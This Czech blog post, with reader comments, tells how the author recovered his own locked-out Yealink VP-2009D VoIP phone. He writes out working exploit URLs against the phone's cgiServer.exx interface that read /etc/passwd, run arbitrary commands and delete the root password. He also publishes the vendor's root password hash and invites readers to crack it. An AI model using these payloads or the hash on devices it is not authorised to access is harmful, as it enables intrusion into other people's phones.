abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

včera 23:55 | Pozvánky

Spolek OpenAlt zve příznivce otevřených technologií a otevřeného přístupu na 145. brněnský sraz, který proběhne v pátek 20. října od 18:00 hodin v restauraci Time Out na adrese Novoměstská 2 v Řečkovicích. Jedná se o poslední sraz před konferencí OpenAlt 2017, jež proběhne o víkendu 4. a 5. listopadu 2017 na FIT VUT v Brně. Běží registrace účastníků.

Ladislav Hagara | Komentářů: 0
včera 21:44 | Nová verze

Byla vydána verze 5.2.0 multiplatformního virtualizačního nástroje Oracle VM VirtualBox. Jedná se o první stabilní verzi z nové větve 5.2. Z novinek lze zmínit například možnost exportování VM do Oracle Cloudu, bezobslužnou instalaci hostovaného systému nebo vylepšené GUI. Podrobnosti v seznamu změn. Aktualizována byla také dokumentace.

Ladislav Hagara | Komentářů: 1
včera 14:00 | Zajímavý projekt

Byl spuštěn Humble Down Under Bundle. Za vlastní cenu lze koupit multiplatformní hry The Warlock of Firetop Mountain, Screencheat, Hand of Fate a Satellite Reign. Při nadprůměrné platbě (aktuálně 3,63 $) také Hacknet, Hacknet Labyrinths, Crawl a Hurtworld. Při platbě 12 $ a více lze získat navíc Armello.

Ladislav Hagara | Komentářů: 0
včera 13:00 | Nová verze

Google Chrome 62 byl prohlášen za stabilní (YouTube). Nejnovější stabilní verze 62.0.3202.62 tohoto webového prohlížeče přináší řadu oprav a vylepšení. Vylepšeny byly také nástroje pro vývojáře (YouTube). Opraveno bylo 35 bezpečnostních chyb.

Ladislav Hagara | Komentářů: 2
včera 11:00 | Zajímavý článek

Článek (en) na Mozilla.cz je věnován vykreslování stránek ve Firefoxu. V průběhu roku 2018 by se ve Firefoxu měl objevit WebRender, jenž by měl vykreslování stránek urychlit díky využití GPU.

Ladislav Hagara | Komentářů: 4
včera 08:22 | Bezpečnostní upozornění

NÚKIB (Národní úřad pro kybernetickou a informační bezpečnost) informuje o zranitelnosti ROCA v procesu generování RSA klíčů, který se odehrává v softwarové knihovně implementované například v kryptografických čipových kartách, bezpečnostních tokenech a dalších hardwarových čipech vyrobených společností Infineon Technologies AG. Zranitelnost umožňuje praktický faktorizační útok, při kterém útočník dokáže vypočítat

… více »
Ladislav Hagara | Komentářů: 3
včera 01:23 | Zajímavý software

Příspěvek na blogu otevřené certifikační autority Let's Encrypt informuje o začlenění podpory protokolu ACME (Automatic Certificate Management Environment) přímo do webového serveru Apache. Klienty ACME lze nahradit novým modulem Apache mod_md. Na vývoj tohoto modulu bylo uvolněno 70 tisíc dolarů z programu Mozilla Open Source Support (MOSS). K rozchození HTTPS na Apache stačí nově přidat do konfiguračního souboru řádek s ManagedDomain. Minutový videonávod na YouTube [reddit].

Ladislav Hagara | Komentářů: 2
17.10. 14:15 | Komunita

Daniel Stenberg, autor nástroje curl, na svém blogu oznámil, že obdržel letošní Polhemovu cenu, kterou uděluje Švédská inženýrská asociace za „technologickou inovaci nebo důvtipné řešení technického problému“.

marbu | Komentářů: 10
17.10. 13:40 | Pozvánky

Cílem Social Good Hackathonu, který se uskuteční 21. a 22. října v Brně, je vymyslet a zrealizovat projekty, které pomůžou zlepšit svět kolem nás. Je to unikátní příležitost, jak představit nejrůznější sociální projekty a zrealizovat je, propojit aktivní lidi, zástupce a zástupkyně nevládních organizací a lidi z prostředí IT a designu. Hackathon pořádá brněnská neziskovka Nesehnutí.

… více »
Barbora | Komentářů: 1
17.10. 00:44 | Pozvánky

V sobotu 21. října 2017 se na půdě Elektrotechnické fakulty ČVUT v Praze uskuteční RT-Summit – setkání vývojářů linuxového jádra a uživatelů jeho real-time verze označované jako preempt-rt.

… více »
Pavel Píša | Komentářů: 8
Jak se vás potenciálně dotkne trend odstraňování analogového audio konektoru typu 3,5mm jack z „chytrých telefonů“?
 (13%)
 (2%)
 (0%)
 (2%)
 (73%)
 (11%)
Celkem 63 hlasů
 Komentářů: 4, poslední včera 21:50
    Rozcestník

    Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul

    2.6. 21:46 | Přečteno: 855× | Linux

    Před pár lety jsem na „íbeji“ za levný peníz trhnul jeden Yealink VP-2009D telefon. Vzhledem k tomu, že se snažím protřídit přebytečné věci, zapojil jsem telefon do testovací sítě a koukal, zda-li vše funguje. Nefungovalo, protože sice to má pěkný hardware, ale firmware je naprosto tristní. Tak jsem v telefonu downgradoval firmware z 22.21.0.108 na 22.21.0.99 a najednou to začalo volat (tedy: alespoň echotest co mám na svém asterisku pro tyto účely). Jenže pak mě napadla naprosto idiotská myšlenka: změnit heslo z defaulního 'admin' na něco méně uhodnutelného.

    To jsem však neměl dělat! Poté, co jsem si vygeroval heslo s cca 35 znaky a toto heslo zkopíroval do webového rozhraní, se najednou nemoho připojit. Zkouším nové heslo, zkouším admin - nic. Zkouším z hesla postupně uhlodávat jednotlivé znaky (zezadu) - po 1/4 hodině skončím na 10 znacích a taky nic. Přihlásim se sice jako uživatel 'user', ale to mi na moc věcí není. Na internetu najdu, že se u telefonů této značky dá heslo zresetovat dlouhým podržením tlačítka 'ok'. Jenže ani to nefunguje - buď mám blbou verzi firmware, nebo to s tímto konkrétním modelem nefunguje vůbec. A upgradovat firmware normální cestou nelze, protože k tomu potřebuji administrátorské heslo. Uááá!

    Ovšem pak jsem si vzpomněl, že se telefony od Yealinku daly hacknout. Sám jsem to nikdy nezkoušel, protože u jiných kousků jsem měl příliš nový firmware, kde už díry byly zalepeny (zřejmě asi zdaleka ne všechny, ale nikdy jsem neměl dost trpělivosti hledat, jak na to. Ovšem tento telefon byla dosti stará verze s pouhými 128MB RAM, takže na ni nejde dát firmware V40 a vyšší. Je tedy dosti šance, že díry jsou ještě otevřené. Přinejmenším má telefon otevřený telnet:

    $ telnet yealink
    Trying 192.168.*.*...
    Connected to yealink.doma.
    Escape character is '^]'.
    
    Welcome to Linux 2.6.10 on VP-2008
    login:
    

    To sice vypadá zajimavě (v pozdějších verzích firmware je telnet už zakázán úplně, anebo se ale musí určitým hackem povolit), ale pokud člověk nezná rootovské heslo, tak je i tak dosti namydlen. Ovšem děr je v telefonu více než dost (viz: 1, 2, 3), takže jednak je možné velmi jednoduše stahovat z telefonu rozličné soubory:

    http://{IP}/cgi-bin/cgiServer.exx?download=/etc/passwd

    Je ovšem i velmi jednoduše možné spouštět příkazy, viz např.:

     http://{IP}/cgi-bin/cgiServer.exx?command=system%28%22dmesg%20>%20/tmp/dmesg%22%29
    # některé prohlížeče vzládnou i přímo:
    # http://{IP}/cgi-bin/cgiServer.exx?command=system("dmesg > /tmp/dmesg")
    

    Takže není problém zrušit heslo u roota:

    http://{IP}/cgi-bin/cgiServer.exx?command=system("passwd -d root")
    

    Pak už se bez problému připojíme na telnet:

    $ telnet yealink
    Trying 192.168.*.*...
    Connected to yealink.doma.
    Escape character is '^]'.
    
    Welcome to Linux 2.6.10 on VP-2008
    login: root
    # 
    

    V tuto chvíli pak trvá jen krátce, než zjistíme, že hesla pro webové rozhraní se nacházejí v klasickém htpasswd souboru v /rundata/data/htpasswd. Takže není nic jednoduššího než si bokem vytvořit jiný htpasswd soubor klasickým způsobem (bacha, umí to myslím jen crypt a asi MD5!) a heslo z něj zkopírovat na VP2009D. Vi tam samozřejmě nechybí, takže alespoň maličký "komfort". Nicméně teď kecám, protože existuje ještě daleko jednodušší cesta a sice zkopírovat "tovární" verzi tohoto souboru, která se nachází v /phone/factory/data/htpasswd, takže by mělo fungovat přinejmenším něco jako:

    cat /phone/factory/data/htpasswd > /rundata/data/htpasswd
    

    Každopádně telefon se mi podařilo znovu rozběhnout a následně zjistit, že heslo pro webové rozhraní nesmí být delší než 16 znaků. Lahůdka! Vedlejším efektem je, že teď mám přístup k rootovi přes telnet. Samozřejmě jsem si hned nastavil pro roota heslo jiné ;-). Nicméně trošku si zahrávám s myšlenkou (na jejíž realizaci bohužel vůbec není čas), vytvořit opravdu otevřený a opensource firmware pro hardwarové telefony. Největší potíž asi bude s ovladačemi pro jádro, a hlavně asi pro ten jeji DSP... :-(. No, ale sen je to pěkný, ne? Nebýt závislý na libovůli výrobců a OEM, na jejich chybách a svévolném ukončení podpory...

    Mimochodem, původní hash z /etc/passwd pro roota je $1$RTR39Lv9$2dDkMT2ZP4nRmqFC8hKP4/. Nechcete ho někdo cracknout?

           

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    2.6. 23:55 pc2005 | skóre: 34 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    s pouhými 128MB RAM, takže na ni nejde dát firmware V40 a vyšší
    WTF můj mobil s Windows Mobile/mou distribucí linuxu s Xkama má jen 64MB RAM :-D.
    $1$RTR39Lv9$2dDkMT2ZP4nRmqFC8hKP4/
    Pole typu hashe "$1$" by mělo být MD5, na ten jsou rainbow tabulky. Druhé pole by měl být salt a třetí pole bude zakódovanej md5. Akorát nevím utilitu která z toho "2dDkMT2ZP4nRmqFC8hKP4" zase získá zpátky ten hash v hexakódu. Se saltem asi bude u rainbow tabulek menší problém, ale pokud víš jaké původní heslo jsi tam zadával tak to může být nějaká obskurní ořezávaná kombinace toho saltu a tvýho hesla (klidně to nemuselo uříznout poslední znaky, ale naopak ty první) apod.
    Největší potíž asi bude s ovladačemi pro jádro, a hlavně asi pro ten jeji DSP.
    Pokud použiješ stejnou verzi jádra nebo uděláš wrapper, tak bys mohl použít jejich kernel driver bloby. Na zbytek je buildroot/openwrt/ddwrt apod. Nehledě na to že pokud ty jejich kernel bloby používaj jakoukoliv funkci, která je exportovaná jako GPL, tak jsou povinni dodat zdroják (podle GPL).
    Chuck Norris řekl babičce, že si dá jen 3 knedlíky. A dostal 3 knedlíky. | 帮帮我,我被锁在中国房
    2.6. 23:57 pc2005 | skóre: 34 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    P.S. víš vůbec co v tom je za SoC? Bez dokumentace toho moc nenapíšeš (maximálně userspace ale i na ten potřebuješ mít minimálně cross kompiler).
    Chuck Norris řekl babičce, že si dá jen 3 knedlíky. A dostal 3 knedlíky. | 帮帮我,我被锁在中国房
    Petr Tomášek avatar 3.6. 00:13 Petr Tomášek | skóre: 37 | blog: Vejšplechty
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    # cat /proc/cpuinfo 
    Processor       : ARM926EJ-Sid(wb) rev 5 (v5l)
    BogoMIPS        : 147.45
    Features        : swp half thumb fastmult edsp java 
    CPU implementer : 0x41
    CPU architecture: 5TEJ
    CPU variant     : 0x0
    CPU part        : 0x926
    CPU revision    : 5
    Cache type      : write-back
    Cache clean     : cp15 c7 ops
    Cache lockdown  : format C
    Cache format    : Harvard
    I size          : 16384
    I assoc         : 4
    I line length   : 32
    I sets          : 128
    D size          : 8192
    D assoc         : 4
    D line length   : 32
    D sets          : 64
    
    Hardware        : VP2009TD_HV01_SV01
    Revision        : 0000
    Serial          : 0000000000000000
    

    Pak to tam má v sobě nějaký DSP, který o sobě tvrdí, že se jmenuje DaVinci...

    3.6. 06:21 pc2005 | skóre: 34 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    To bude tohle. Texas instruments maj jeden z nejlepších dokumentací na tom C64x DSP bys teoreticky mohl napsat ty akcelerační věci sám.
    Chuck Norris řekl babičce, že si dá jen 3 knedlíky. A dostal 3 knedlíky. | 帮帮我,我被锁在中国房
    Petr Tomášek avatar 3.6. 09:14 Petr Tomášek | skóre: 37 | blog: Vejšplechty
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    Asi jo. Ještě jsem našel:
    # cat /sys/vendor/mvista/lspinfo/summary
    Board Name              : TI DaVinci - DM644x Processor (little endian)
    Lsp Name                : ti-davinci_evm
    LSP Revision            : 0600990.1
    MVL Architecture        : arm_v5t_le
    Patch Level             : 785
    
    Což znamená buď DM6446 nebo DM6441. Asi to budu muset otevřít a podívat se, co stojí na švábu...
    3.6. 22:26 pc2005 | skóre: 34 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    Hmm to bude distribuce montavista linux. Bych dumpnul filesystém z toho se daj zjistit další věci.
    Chuck Norris řekl babičce, že si dá jen 3 knedlíky. A dostal 3 knedlíky. | 帮帮我,我被锁在中国房
    Petr Tomášek avatar 4.6. 00:32 Petr Tomášek | skóre: 37 | blog: Vejšplechty
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    Neboj, zazálohoval jsem, co se dalo. Dokonce i zcela prázdnou mtd partišnu a partišnu zřejmě s logem pro boot :-)
    Petr Tomášek avatar 3.6. 00:15 Petr Tomášek | skóre: 37 | blog: Vejšplechty
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    ale pokud víš jaké původní heslo jsi tam zadával tak to může být nějaká obskurní ořezávaná kombinace toho saltu a tvýho hesla

    žádné heslo jsem nezadával. jedná se o rootovský heslo, který tam zadal (natvrdo???) výrobce a který považuje za obchodní tajemství...

    3.6. 06:21 pc2005 | skóre: 34 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Jak jsem si bricknul Yealink VP-2009D a pak zase hacknul
    Aha tak to půjde blbě (já myslel že to je to samý kterým jsi to rozbil). Tím že se hledaj jenom kolize, tak se nejspíš nenajde původní řetězec, ale jen ten pro ten daný typ zařízení, který pasuje k danému saltu. Už i jiná verze firmware by mohla mít jinej salt a to heslo vygenerované kolizí by tam nefungovalo.

    Samozřejmě pokud použili věci jako jméno zařízení, 1234, nbusr123. Tak to nejspíš najde správně (než kdyby jako heslo použili třeba string z vlastního interního md5 hashe) :-D.
    Chuck Norris řekl babičce, že si dá jen 3 knedlíky. A dostal 3 knedlíky. | 帮帮我,我被锁在中国房

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.